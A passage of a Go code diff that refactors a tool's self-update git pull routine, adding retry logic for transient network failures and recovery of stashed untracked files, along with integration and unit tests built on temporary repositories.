+ }
}
- // SECURITY CHECK: Verify remote is trusted BEFORE pulling
- if err := VerifyTrustedRemote(rc, repoDir); err != nil {
- return false, "", err // Error already includes detailed message
+ if options.VerifyRemote {
+ if err := VerifyTrustedRemote(rc, repoDir); err != nil {
+ return nil, err
+ }
}
- // Get commit before pull
- commitBefore, err := GetCurrentCommit(rc, repoDir)
- if err != nil {
- return false, "", fmt.Errorf("failed to get commit before pull: %w", err)
+ if options.FailOnMissingHTTPSCredentials {
+ if err := EnsureCredentials(rc, repoDir); err != nil {
+ return nil, err
+ }
}
- // Check if we have uncommitted changes
- statusCmd := exec.Command("git", "-C", repoDir, "status", "--porcelain")
- statusOutput, err := statusCmd.Output()
+ commitBefore, err := GetCurrentCommit(rc, repoDir)
if err != nil {
- return false, "", fmt.Errorf("failed to check git status: %w", err)
+ return nil, fmt.Errorf("failed to get commit before pull: %w", err)
}
+ result.CommitBefore = commitBefore
- hasChanges := len(statusOutput) > 0
-
- // If we have changes, create a stash BEFORE pulling
- if hasChanges {
- logger.Info("Uncommitted changes detected, creating stash for rollback safety",
- zap.String("message", "eos self-update auto-stash"))
-
- // Create stash with descriptive message
- stashCmd := exec.Command("git", "-C", repoDir, "stash", "push", "-m", "eos self-update auto-stash")
- stashOutput, err := stashCmd.CombinedOutput()
+ if options.FetchFirst {
+ remoteCommit, err := fetchRemoteBranch(rc, repoDir, branch)
if err != nil {
- return false, "", fmt.Errorf("failed to create stash: %w\nOutput: %s",
- err, strings.TrimSpace(string(stashOutput)))
+ return nil, err
}
+ result.RemoteCommit = remoteCommit
+ if remoteCommit == commitBefore {
+ result.CommitAfter = commitBefore
+ logger.Info("Already on latest version",
+ zap.String("event", "self_update.git.pull.up_to_date_after_fetch"),
+ zap.String("commit", shortRef(commitBefore)))
+ return result, nil
+ }
+ }
- logger.Debug("Stash created", zap.String("output", strings.TrimSpace(string(stashOutput))))
-
- // Get stash ref (full SHA of stash@{0})
- // CRITICAL: We need the full SHA, not symbolic ref, because stash@{0} changes
- // when new stashes are created. The SHA is immutable.
- stashRefCmd := exec.Command("git", "-C", repoDir, "rev-parse", "stash@{0}")
- stashRefOutput, err := stashRefCmd.Output()
+ if options.TrackRollbackStash {
+ result.StashRef, err = createRollbackStash(rc, repoDir)
if err != nil {
- // This is critical - if we can't get stash ref, we can't safely rollback
- return false, "", fmt.Errorf("failed to get stash ref after creating stash: %w\n"+
- "CRITICAL: Stash was created but ref cannot be retrieved.\n"+
- "Manual recovery required:\n"+
- " git -C %s stash list\n"+
- " git -C %s stash pop # If you want to restore changes",
- err, repoDir, repoDir)
+ return nil, err
}
-
- stashRef = strings.TrimSpace(string(stashRefOutput))
- logger.Info("Stash created successfully for rollback safety",
- zap.String("ref", stashRef[:8]+"..."),
- zap.String("symbolic", "stash@{0}"))
- } else {
- logger.Debug("No uncommitted changes, no stash needed")
}
- // Now pull WITHOUT --autostash (we already manually stashed if needed)
- pullCmd := exec.Command("git", "-C", repoDir, "pull", "origin", branch)
- pullOutput, err := pullCmd.CombinedOutput()
+ autostash := options.Autostash && !options.TrackRollbackStash
+ pullOutput, err := runGitPullWithRetry(rc, repoDir, branch, autostash)
+ result.PullOutput = strings.TrimSpace(string(pullOutput))
if err != nil {
- // Pull failed - try to restore stash if we created one
- if stashRef != "" {
+ if result.StashRef != "" {
logger.Warn("Pull failed, attempting to restore stash",
- zap.String("stash_ref", stashRef[:8]+"..."))
+ zap.String("stash_ref", shortRef(result.StashRef)))
- // Use 'git stash apply [' instead of 'git stash pop'
- // This is safer because it doesn't remove the stash if apply fails
- applyCmd := exec.Command("git", "-C", repoDir, "stash", "apply", stashRef)
- applyOutput, applyErr := applyCmd.CombinedOutput()
- if applyErr != nil {
+ if restoreErr := RestoreStash(rc, repoDir, result.StashRef); restoreErr != nil {
logger.Error("Failed to restore stash after failed pull",
- zap.Error(applyErr),
- zap.String("output", string(applyOutput)),
- zap.String("stash_ref", stashRef))
- return false, "", fmt.Errorf("pull failed AND stash restore failed\n"+
+ zap.Error(restoreErr),
+ zap.String("stash_ref", result.StashRef))
+ return nil, fmt.Errorf("pull failed AND stash restore failed\n"+
"Pull error: %w\n"+
"Pull output: %s\n\n"+
- "Stash restore error: %v\n"+
- "Stash restore output: %s\n\n"+
- "Manual recovery required:\n"+
- " git -C %s stash apply %s",
- err, strings.TrimSpace(string(pullOutput)),
- applyErr, strings.TrimSpace(string(applyOutput)),
- repoDir, stashRef)
+ "Stash restore error: %v",
+ err, result.PullOutput, restoreErr)
}
logger.Info("Stash restored successfully after failed pull")
}
- return false, "", fmt.Errorf("git pull failed: %w\nOutput: %s",
- err, strings.TrimSpace(string(pullOutput)))
+ return nil, fmt.Errorf("git pull failed: %w\nOutput: %s", err, result.PullOutput)
}
- logger.Debug("Git pull completed",
- zap.String("output", strings.TrimSpace(string(pullOutput))))
+ logger.Debug("Git pull completed", zap.String("output", result.PullOutput))
- // Get commit after pull
commitAfter, err := GetCurrentCommit(rc, repoDir)
if err != nil {
- // Pull succeeded but can't get commit - try to restore stash
- if stashRef != "" {
+ if result.StashRef != "" {
logger.Warn("Failed to get commit after pull, restoring stash")
- applyCmd := exec.Command("git", "-C", repoDir, "stash", "apply", stashRef)
- _ = applyCmd.Run() // Best effort
+ if restoreErr := RestoreStash(rc, repoDir, result.StashRef); restoreErr != nil {
+ logger.Warn("Best-effort stash restore failed after commit lookup error",
+ zap.Error(restoreErr),
+ zap.String("stash_ref", shortRef(result.StashRef)))
+ }
}
- return false, stashRef, fmt.Errorf("failed to get commit after pull: %w", err)
+ return nil, fmt.Errorf("failed to get commit after pull: %w", err)
}
+ result.CommitAfter = commitAfter
+ result.CodeChanged = commitBefore != commitAfter
- codeChanged = commitBefore != commitAfter
-
- if !codeChanged {
+ if !result.CodeChanged {
logger.Info("Already on latest version",
- zap.String("commit", commitAfter[:8]))
+ zap.String("commit", shortRef(commitAfter)))
- // No code changes - restore stash immediately (don't need rollback capability)
- if stashRef != "" {
+ if result.StashRef != "" {
logger.Info("No code changes, restoring stash immediately")
- applyCmd := exec.Command("git", "-C", repoDir, "stash", "apply", stashRef)
- applyOutput, applyErr := applyCmd.CombinedOutput()
- if applyErr != nil {
- logger.Warn("Failed to restore stash after no-op pull",
- zap.Error(applyErr),
- zap.String("output", string(applyOutput)))
- // Don't fail the operation, just warn
- return false, stashRef, fmt.Errorf("no code changes but stash restore failed: %v\n"+
- "Manual recovery: git -C %s stash apply %s",
- applyErr, repoDir, stashRef)
+ if err := RestoreStash(rc, repoDir, result.StashRef); err != nil {
+ return nil, fmt.Errorf("no code changes but stash restore failed: %v", err)
}
logger.Info("Stash restored successfully (no code changes)")
- stashRef = "" // Clear stash ref - changes restored, no rollback needed
+ result.StashRef = ""
}
- return false, stashRef, nil
+ return result, nil
}
logger.Info("Updates pulled",
- zap.String("from", commitBefore[:8]),
- zap.String("to", commitAfter[:8]))
+ zap.String("event", "self_update.git.pull.updated"),
+ zap.String("from", shortRef(commitBefore)),
+ zap.String("to", shortRef(commitAfter)))
+
+ if options.VerifyCommitSignatures {
+ results, err := VerifyCommitChain(rc, repoDir, commitBefore, commitAfter)
+ if err != nil {
+ logger.Error("Commit signature verification failed", zap.Error(err))
+ }
+ logVerificationWarnings(logger, results)
+ }
- // SECURITY CHECK: Verify GPG signatures on new commits
- results, err := VerifyCommitChain(rc, repoDir, commitBefore, commitAfter)
+ if result.StashRef != "" {
+ logger.Info("Stash tracked for potential rollback",
+ zap.String("ref", shortRef(result.StashRef)))
+ }
+
+ return result, nil
+}
+
+// PullLatestCode preserves the legacy API while delegating to PullRepository.
+func PullLatestCode(rc *eos_io.RuntimeContext, repoDir, branch string) error {
+ _, err := PullRepository(rc, repoDir, branch, PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ Autostash: true,
+ })
+ return err
+}
+
+// PullWithVerification preserves the legacy API while delegating to PullRepository.
+func PullWithVerification(rc *eos_io.RuntimeContext, repoDir, branch string) (bool, error) {
+ result, err := PullRepository(rc, repoDir, branch, PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ VerifyCommitSignatures: true,
+ Autostash: true,
+ })
if err != nil {
- logger.Error("Commit signature verification failed", zap.Error(err))
- // Don't fail update for unsigned commits (yet), just warn
- // This will be enforced when GPG signing is standard practice
+ return false, err
}
+ return result.CodeChanged, nil
+}
- // Log warnings from signature verification
+// PullWithStashTracking preserves the legacy API while delegating to PullRepository.
+func PullWithStashTracking(rc *eos_io.RuntimeContext, repoDir, branch string) (bool, string, error) {
+ result, err := PullRepository(rc, repoDir, branch, PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ TrackRollbackStash: true,
+ VerifyCommitSignatures: true,
+ NormalizeOwnershipForSudo: true,
+ RecoverMergeConflicts: true,
+ FetchFirst: true,
+ })
+ if err != nil {
+ return false, "", err
+ }
+ return result.CodeChanged, result.StashRef, nil
+}
+
+func fetchRemoteBranch(rc *eos_io.RuntimeContext, repoDir, branch string) (string, error) {
+ logger := otelzap.Ctx(rc.Ctx)
+ args := []string{"-C", repoDir, "fetch", "--prune", "origin", branch}
+ // #nosec G204 -- args are assembled from fixed tokens plus validated branch/repo inputs.
+ cmd := exec.Command("git", args...)
+ if extraEnv := GitPullEnv(); len(extraEnv) > 0 {
+ cmd.Env = append(os.Environ(), extraEnv...)
+ }
+ if IsInteractive() {
+ cmd.Stdin = os.Stdin
+ }
+ output, err := cmd.CombinedOutput()
+ if err != nil {
+ return "", fmt.Errorf("git fetch failed: %w\nOutput: %s", err, strings.TrimSpace(string(output)))
+ }
+
+ remoteCommitOutput, err := runGitOutput(repoDir, "rev-parse", "FETCH_HEAD")
+ if err != nil {
+ return "", fmt.Errorf("failed to resolve fetched commit: %w", err)
+ }
+
+ remoteCommit := strings.TrimSpace(string(remoteCommitOutput))
+ logger.Info("Fetched remote branch for pre-pull assessment",
+ zap.String("event", "self_update.git.fetch"),
+ zap.String("branch", branch),
+ zap.String("remote_commit", shortRef(remoteCommit)))
+
+ return remoteCommit, nil
+}
+
+func logVerificationWarnings(logger otelzap.LoggerWithCtx, results []*VerificationResult) {
for _, result := range results {
for _, warning := range result.Warnings {
logger.Warn("SECURITY WARNING", zap.String("warning", warning))
}
}
+}
- // Return with stash ref tracked for rollback
- if stashRef != "" {
- logger.Info("Stash tracked for potential rollback",
- zap.String("ref", stashRef[:8]+"..."))
+func runGitPullWithRetry(rc *eos_io.RuntimeContext, repoDir, branch string, autostash bool) ([]byte, error) {
+ logger := otelzap.Ctx(rc.Ctx)
+ interactive := IsInteractive()
+ extraEnv := GitPullEnv()
+
+ var (
+ lastOutput []byte
+ lastErr error
+ attempts []string // Collect per-attempt context for diagnostics
+ )
+
+ for attempt := 1; attempt <= GitPullMaxAttempts; attempt++ {
+ output, err := runGitPullAttempt(repoDir, branch, autostash, interactive, extraEnv)
+ if err == nil {
+ if attempt > 1 {
+ logger.Info("Git pull succeeded after transient failure(s)",
+ zap.Int("successful_attempt", attempt),
+ zap.Strings("prior_failures", attempts))
+ }
+ return output, nil
+ }
+
+ outputStr := strings.TrimSpace(string(output))
+ lastOutput = output
+ lastErr = err
+
+ transient, reason := isTransientGitPullFailure(outputStr)
+ attempts = append(attempts, fmt.Sprintf("attempt=%d reason=%s", attempt, reason))
+
+ if !transient {
+ logger.Warn("Permanent git pull failure, not retrying",
+ zap.String("reason", reason),
+ zap.String("output", outputStr))
+ break
+ }
+
+ if attempt == GitPullMaxAttempts {
+ logger.Error("Git pull failed after all retry attempts",
+ zap.Int("attempts", attempt),
+ zap.Strings("failure_history", attempts))
+ break
+ }
+
+ backoff := retryBackoff(attempt)
+ logger.Warn("Transient git pull failure, retrying",
+ zap.Int("attempt", attempt),
+ zap.Int("max_attempts", GitPullMaxAttempts),
+ zap.Duration("backoff", backoff),
+ zap.String("reason", reason),
+ zap.String("output", outputStr))
+ gitPullRetrySleep(backoff)
}
- return true, stashRef, nil
+ return lastOutput, fmt.Errorf("git pull failed after %d attempt(s) [%s]: %w",
+ len(attempts), strings.Join(attempts, "; "), lastErr)
+}
+
+// retryBackoff calculates backoff duration with jitter to prevent thundering herd.
+// Formula: (attempt * base) + random(0, maxJitter).
+func retryBackoff(attempt int) time.Duration {
+ base := time.Duration(attempt) * GitPullBaseBackoff
+ jitter := randomJitterDuration(GitPullMaxJitter)
+ return base + jitter
+}
+
+func randomJitterDuration(max time.Duration) time.Duration {
+ if max <= 0 {
+ return 0
+ }
+ n, err := cryptorand.Int(cryptorand.Reader, big.NewInt(max.Nanoseconds()+1))
+ if err != nil {
+ return 0
+ }
+ return time.Duration(n.Int64())
+}
+
+// permanentMarkers lists error substrings that indicate non-retryable failures.
+// These represent deterministic errors that won't resolve on retry.
+// Reference: CLAUDE.md Retry Logic section.
+var permanentMarkers = []string{
+ "authentication failed",
+ "permission denied",
+ "repository not found",
+ "could not read username",
+ "not in trusted whitelist",
+ "security violation",
+ "invalid credentials",
+}
+
+// transientMarkers maps error substrings to reason codes for retryable failures.
+// Sources:
+// - HTTP 5xx/429: RFC 9110 sections 15.6.3-15.6.5
+// - Git network errors: git source, observed in production logs
+// - DNS/TLS: OS-level transient failures
+var transientMarkers = map[string]string{
+ // HTTP gateway/server errors (RFC 9110)
+ "requested url returned error: 500": "http_500",
+ "requested url returned error: 502": "http_502",
+ "requested url returned error: 503": "http_503",
+ "requested url returned error: 504": "http_504",
+ "requested url returned error: 429": "http_429",
+ // TLS errors
+ "tls handshake timeout": "tls_timeout",
+ // Network-level errors
+ "i/o timeout": "io_timeout",
+ "connection reset by peer": "connection_reset",
+ "connection refused": "connection_refused",
+ "broken pipe": "broken_pipe",
+ "unexpected eof": "unexpected_eof",
+ // DNS errors
+ "temporary failure in name resolution": "dns_temporary_failure",
+ "could not resolve host": "dns_resolution_failure",
+ // Git-specific transient errors
+ "remote end hung up unexpectedly": "remote_hung_up",
}
-// RestoreStash restores a specific stash by its SHA ref
-// P0-2 FIX: Used during rollback to restore uncommitted changes
+func isTransientGitPullFailure(output string) (bool, string) {
+ lower := strings.ToLower(strings.TrimSpace(output))
+
+ for _, marker := range permanentMarkers {
+ if strings.Contains(lower, marker) {
+ return false, gitPullFailureReasonPermanent
+ }
+ }
+
+ for marker, reason := range transientMarkers {
+ if strings.Contains(lower, marker) {
+ return true, reason
+ }
+ }
+
+ return false, gitPullFailureReasonUnknown
+}
+
+// RestoreStash restores a specific stash by its SHA ref.
+// P0-2 FIX: Used during rollback to restore uncommitted changes.
+//
+// Handles the common failure mode where `git stash apply` fails with
+// "could not restore untracked files from stash" because untracked files
+// already exist in the working tree. In this case, we remove the blocking
+// untracked files (they came from the stash, so they'll be restored) and retry.
+//
+// We use 'apply' instead of 'pop' because:
+// 1. If apply fails, stash is still preserved for manual recovery
+// 2. We can verify apply succeeded before dropping the stash
func RestoreStash(rc *eos_io.RuntimeContext, repoDir, stashRef string) error {
logger := otelzap.Ctx(rc.Ctx)
@@ -415,26 +757,84 @@ func RestoreStash(rc *eos_io.RuntimeContext, repoDir, stashRef string) error {
}
logger.Info("Restoring stash from rollback",
- zap.String("ref", stashRef[:8]+"..."))
-
- // Use 'git stash apply ][' to restore the stash
- // We use 'apply' instead of 'pop' because:
- // 1. If apply fails, stash is still preserved for manual recovery
- // 2. We can verify apply succeeded before dropping the stash
- applyCmd := exec.Command("git", "-C", repoDir, "stash", "apply", stashRef)
- applyOutput, err := applyCmd.CombinedOutput()
- if err != nil {
+ zap.String("ref", shortRef(stashRef)))
+
+ applyOutput, err := runGitCombinedOutput(repoDir, "stash", "apply", stashRef)
+ if err == nil {
+ logger.Info("Stash restored successfully",
+ zap.String("ref", shortRef(stashRef)))
+ return nil
+ }
+
+ outputStr := strings.TrimSpace(string(applyOutput))
+
+ // Handle "could not restore untracked files from stash":
+ // This happens when untracked files that were in the stash already exist
+ // in the working tree (e.g., created by a build step between stash and restore).
+ // Fix: remove the blocking files then retry apply.
+ if !strings.Contains(outputStr, "could not restore untracked files from stash") &&
+ !strings.Contains(outputStr, "already exists, no checkout") {
+ return fmt.Errorf("failed to restore stash: %w\n"+
+ "Output: %s\n\n"+
+ "Manual recovery:\n"+
+ " git -C %s stash apply %s",
+ err, outputStr, repoDir, stashRef)
+ }
+
+ logger.Warn("Stash apply failed due to existing untracked files, removing blockers and retrying",
+ zap.String("ref", shortRef(stashRef)))
+
+ // List untracked files from the stash's third parent (the untracked tree)
+ // git rev-parse stashRef^3 gives the tree of untracked files
+ untrackedTreeOutput, treeErr := runGitOutput(repoDir, "rev-parse", "--verify", stashRef+"^3")
+ if treeErr != nil {
+ logger.Debug("Stash has no untracked files tree, cannot auto-recover",
+ zap.Error(treeErr))
return fmt.Errorf("failed to restore stash: %w\n"+
"Output: %s\n\n"+
"Manual recovery:\n"+
" git -C %s stash apply %s",
- err, strings.TrimSpace(string(applyOutput)),
- repoDir, stashRef)
+ err, outputStr, repoDir, stashRef)
}
- logger.Info("Stash restored successfully",
- zap.String("ref", stashRef[:8]+"..."))
+ untrackedTree := strings.TrimSpace(string(untrackedTreeOutput))
+ filesOutput, filesErr := runGitCombinedOutput(repoDir, "ls-tree", "-r", "--name-only", untrackedTree)
+ if filesErr != nil {
+ return fmt.Errorf("failed to list stash untracked files: %w", filesErr)
+ }
+
+ // Remove the blocking untracked files so stash apply can recreate them.
+ // NOTE: These files exist because they were recreated between stash and restore
+ // (e.g., by a build step). The stashed versions will replace them.
+ for _, fname := range strings.Split(strings.TrimSpace(string(filesOutput)), "\n") {
+ if fname == "" {
+ continue
+ }
+ fullPath := filepath.Join(repoDir, fname)
+ if _, statErr := os.Stat(fullPath); statErr == nil {
+ logger.Info("Removing blocking untracked file to restore stashed version",
+ zap.String("file", fname),
+ zap.String("reason", "file recreated between stash and restore"))
+ }
+ if rmErr := os.Remove(fullPath); rmErr != nil && !os.IsNotExist(rmErr) {
+ logger.Warn("Could not remove blocking untracked file",
+ zap.String("file", fname),
+ zap.Error(rmErr))
+ }
+ }
+
+ // Retry apply after removing blockers
+ retryOutput, retryErr := runGitCombinedOutput(repoDir, "stash", "apply", stashRef)
+ if retryErr != nil {
+ return fmt.Errorf("failed to restore stash after removing blockers: %w\n"+
+ "Output: %s\n\n"+
+ "Manual recovery:\n"+
+ " git -C %s stash apply %s",
+ retryErr, strings.TrimSpace(string(retryOutput)), repoDir, stashRef)
+ }
+ logger.Info("Stash restored successfully after removing blocking untracked files",
+ zap.String("ref", shortRef(stashRef)))
return nil
}
@@ -558,7 +958,7 @@ func ResetToCommit(rc *eos_io.RuntimeContext, repoDir, commitHash string) error
logger.Warn("Performing git reset --hard",
zap.String("repo", repoDir),
- zap.String("commit", commitHash[:8]))
+ zap.String("commit", shortRef(commitHash)))
resetCmd := exec.Command("git", "-C", repoDir, "reset", "--hard", commitHash)
resetOutput, err := resetCmd.CombinedOutput()
@@ -568,7 +968,7 @@ func ResetToCommit(rc *eos_io.RuntimeContext, repoDir, commitHash string) error
}
logger.Info("Git repository reset successfully",
- zap.String("commit", commitHash[:8]))
+ zap.String("commit", shortRef(commitHash)))
return nil
}
diff --git a/pkg/git/operations_integration_test.go b/pkg/git/operations_integration_test.go
new file mode 100644
index 000000000..2e3bc2de2
--- /dev/null
+++ b/pkg/git/operations_integration_test.go
@@ -0,0 +1,63 @@
+//go:build integration
+
+package git
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/constants"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/testutil"
+ "github.com/stretchr/testify/require"
+)
+
+func TestIntegrationPullWithStashTracking_PreservesUntrackedChanges(t *testing.T) {
+ rc := testutil.TestContext(t)
+ baseDir := t.TempDir()
+
+ remoteBare := filepath.Join(baseDir, "origin.git")
+ runGitTestCmd(t, baseDir, "init", "--bare", remoteBare)
+
+ seedRepo := filepath.Join(baseDir, "seed")
+ require.NoError(t, os.MkdirAll(seedRepo, 0o755))
+ runGitTestCmd(t, seedRepo, "init")
+ runGitTestCmd(t, seedRepo, "config", "user.email", "eos-tests@example.com")
+ runGitTestCmd(t, seedRepo, "config", "user.name", "Eos Tests")
+ runGitTestCmd(t, seedRepo, "branch", "-M", "main")
+
+ require.NoError(t, os.WriteFile(filepath.Join(seedRepo, "app.txt"), []byte("v1\n"), 0o644))
+ runGitTestCmd(t, seedRepo, "add", "app.txt")
+ runGitTestCmd(t, seedRepo, "commit", "-m", "seed v1")
+ runGitTestCmd(t, seedRepo, "remote", "add", "origin", remoteBare)
+ runGitTestCmd(t, seedRepo, "push", "-u", "origin", "main")
+
+ localRepo := filepath.Join(baseDir, "local")
+ runGitTestCmd(t, baseDir, "clone", "--branch", "main", remoteBare, localRepo)
+ runGitTestCmd(t, localRepo, "config", "user.email", "eos-tests@example.com")
+ runGitTestCmd(t, localRepo, "config", "user.name", "Eos Tests")
+
+ require.NoError(t, os.WriteFile(filepath.Join(seedRepo, "app.txt"), []byte("v2\n"), 0o644))
+ runGitTestCmd(t, seedRepo, "add", "app.txt")
+ runGitTestCmd(t, seedRepo, "commit", "-m", "seed v2")
+ runGitTestCmd(t, seedRepo, "push", "origin", "main")
+
+ untracked := filepath.Join(localRepo, "local-dev-notes.txt")
+ require.NoError(t, os.WriteFile(untracked, []byte("my local notes\n"), 0o644))
+
+ originalTrusted := append([]string(nil), constants.TrustedRemotes...)
+ constants.TrustedRemotes = append(constants.TrustedRemotes, remoteBare)
+ t.Cleanup(func() {
+ constants.TrustedRemotes = originalTrusted
+ })
+
+ changed, stashRef, err := PullWithStashTracking(rc, localRepo, "main")
+ require.NoError(t, err)
+ require.True(t, changed)
+ require.NotEmpty(t, stashRef)
+ require.NoFileExists(t, untracked, "untracked file should be stashed during pull")
+
+ err = RestoreStash(rc, localRepo, stashRef)
+ require.NoError(t, err)
+ require.FileExists(t, untracked, "stashed untracked file should be restorable")
+}
diff --git a/pkg/git/operations_pull_test.go b/pkg/git/operations_pull_test.go
new file mode 100644
index 000000000..cfc78f78a
--- /dev/null
+++ b/pkg/git/operations_pull_test.go
@@ -0,0 +1,342 @@
+package git
+
+import (
+ "errors"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "testing"
+ "time"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/testutil"
+ "github.com/stretchr/testify/require"
+)
+
+// --- runGitPullAttempt tests ---
+
+// TestRunGitPullAttempt_InteractiveDoesNotPanic verifies the fix for the
+// "exec: Stderr already set" bug. Previously, setting pullCmd.Stderr = os.Stderr
+// and then calling CombinedOutput() (which also sets Stderr) caused a panic.
+// The fix uses a shared buffer for Stdout and Stderr, avoiding the conflict.
+// Reference: https://pkg.go.dev/os/exec#Cmd.CombinedOutput
+func TestRunGitPullAttempt_InteractiveDoesNotPanic(t *testing.T) {
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+
+ // Run the real runGitPullAttempt with interactive=true against a non-existent repo.
+ // The important thing is it doesn't panic with "exec: Stderr already set".
+ // It will return an error because the repo doesn't exist, which is expected.
+ output, err := runGitPullAttempt(t.TempDir(), "main", false, true, nil)
+ // We expect a git error (not a git repo), NOT a panic
+ require.Error(t, err, "should fail on non-repo, but must not panic")
+ require.NotContains(t, string(output), "Stderr already set",
+ "must not produce 'Stderr already set' error")
+ require.NotContains(t, err.Error(), "Stderr already set",
+ "must not produce 'Stderr already set' error in err")
+}
+
+// TestRunGitPullAttempt_NonInteractiveCapturesOutput verifies output capture
+// works correctly in non-interactive mode.
+func TestRunGitPullAttempt_NonInteractiveCapturesOutput(t *testing.T) {
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+
+ output, err := runGitPullAttempt(t.TempDir(), "main", false, false, nil)
+ require.Error(t, err)
+ // Output should contain a git error message (not empty)
+ require.NotEmpty(t, output, "output should capture git's error message")
+}
+
+// TestRunGitPullAttempt_ExtraEnvIsApplied verifies that extra environment
+// variables (like GIT_TERMINAL_PROMPT=0) are passed to the git process.
+func TestRunGitPullAttempt_ExtraEnvIsApplied(t *testing.T) {
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+
+ // Even with env set, git will fail on non-repo. We're just testing it doesn't crash.
+ _, err := runGitPullAttempt(t.TempDir(), "main", false, false,
+ []string{"GIT_TERMINAL_PROMPT=0"})
+ require.Error(t, err, "should fail on non-repo")
+}
+
+// TestRunGitPullAttempt_AutostashFlag verifies the --autostash flag is included
+// when autostash=true.
+func TestRunGitPullAttempt_AutostashFlag(t *testing.T) {
+ // We can't easily verify the flag is passed without mocking exec.Command,
+ // but we can verify it doesn't crash with autostash=true.
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+
+ _, err := runGitPullAttempt(t.TempDir(), "main", true, false, nil)
+ require.Error(t, err, "should fail on non-repo")
+}
+
+// --- RestoreStash with untracked file collisions ---
+
+// TestRestoreStash_HandlesUntrackedFileCollision verifies that RestoreStash
+// can recover when untracked files from the stash already exist in the
+// working tree. This was the exact failure mode observed in production:
+// "outputs/ci/unit/unit-test.jsonl already exists, no checkout"
+func TestRestoreStash_HandlesUntrackedFileCollision(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ // Create an untracked file, stash it
+ untrackedFile := filepath.Join(repoDir, "build-output.jsonl")
+ require.NoError(t, os.WriteFile(untrackedFile, []byte("original content\n"), 0o644))
+
+ stashRef, err := createRollbackStash(rc, repoDir)
+ require.NoError(t, err)
+ require.NotEmpty(t, stashRef)
+
+ // Now recreate the file (simulating a build step that recreated it)
+ require.NoError(t, os.WriteFile(untrackedFile, []byte("recreated by build\n"), 0o644))
+
+ // RestoreStash should handle this collision gracefully
+ err = RestoreStash(rc, repoDir, stashRef)
+ require.NoError(t, err, "RestoreStash should handle untracked file collision")
+
+ // The file should exist with the stashed content (original)
+ require.FileExists(t, untrackedFile)
+ content, err := os.ReadFile(untrackedFile)
+ require.NoError(t, err)
+ require.Equal(t, "original content\n", string(content),
+ "stash restore should overwrite the recreated file with original content")
+}
+
+// TestRestoreStash_NoCollisionWorksNormally verifies that the normal
+// (no collision) stash restore path still works after our improvement.
+func TestRestoreStash_NoCollisionWorksNormally(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ // Create untracked file and stash it
+ untrackedFile := filepath.Join(repoDir, "notes.txt")
+ require.NoError(t, os.WriteFile(untrackedFile, []byte("my notes\n"), 0o644))
+
+ stashRef, err := createRollbackStash(rc, repoDir)
+ require.NoError(t, err)
+ require.NotEmpty(t, stashRef)
+ require.NoFileExists(t, untrackedFile, "file should be stashed away")
+
+ // Normal restore (no collision)
+ err = RestoreStash(rc, repoDir, stashRef)
+ require.NoError(t, err)
+ require.FileExists(t, untrackedFile)
+}
+
+// TestRestoreStash_InvalidRefReturnsError verifies error handling for bad refs.
+func TestRestoreStash_InvalidRefReturnsError(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ err := RestoreStash(rc, repoDir, "deadbeef1234567890")
+ require.Error(t, err, "should fail with invalid stash ref")
+ require.Contains(t, err.Error(), "Manual recovery",
+ "error should include manual recovery steps")
+}
+
+// --- runGitPullWithRetry tests for interactive mode ---
+
+// TestRunGitPullWithRetry_InteractiveMode verifies retry logic works with
+// interactive=true (the path that previously caused the Stderr bug).
+func TestRunGitPullWithRetry_InteractiveMode(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ callCount := 0
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ callCount++
+ // Verify interactive flag is passed through
+ if !interactive {
+ t.Error("expected interactive=true to be passed through")
+ }
+ if callCount < 2 {
+ return []byte("connection reset by peer"), errors.New("exit status 1")
+ }
+ return []byte("Already up to date."), nil
+ }
+ gitPullRetrySleep = func(d time.Duration) {}
+
+ // PullLatestCode uses autostash=true, but we're testing retry with interactive
+ // through the lower-level function
+ out, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", true)
+ require.NoError(t, err)
+ require.Equal(t, "Already up to date.", string(out))
+ require.Equal(t, 2, callCount)
+}
+
+// --- HasMergeConflicts and RecoverFromMergeConflicts ---
+
+// TestHasMergeConflicts_NoConflicts verifies clean repo detection.
+func TestHasMergeConflicts_NoConflicts(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ hasConflicts, files, err := HasMergeConflicts(rc, repoDir)
+ require.NoError(t, err)
+ require.False(t, hasConflicts)
+ require.Empty(t, files)
+}
+
+// TestHasMergeConflicts_DetectsUUState verifies merge conflict detection
+// with the "UU" (both modified) state that caused the production failure.
+func TestHasMergeConflicts_DetectsUUState(t *testing.T) {
+ rc := testutil.TestContext(t)
+ baseDir := t.TempDir()
+
+ // Create two repos that will conflict
+ repoA := filepath.Join(baseDir, "repoA")
+ require.NoError(t, os.MkdirAll(repoA, 0o755))
+ runGitTestCmd(t, repoA, "init")
+ runGitTestCmd(t, repoA, "config", "user.email", "test@example.com")
+ runGitTestCmd(t, repoA, "config", "user.name", "Test")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("base\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "base")
+
+ // Create branch with conflicting change
+ runGitTestCmd(t, repoA, "checkout", "-b", "feature")
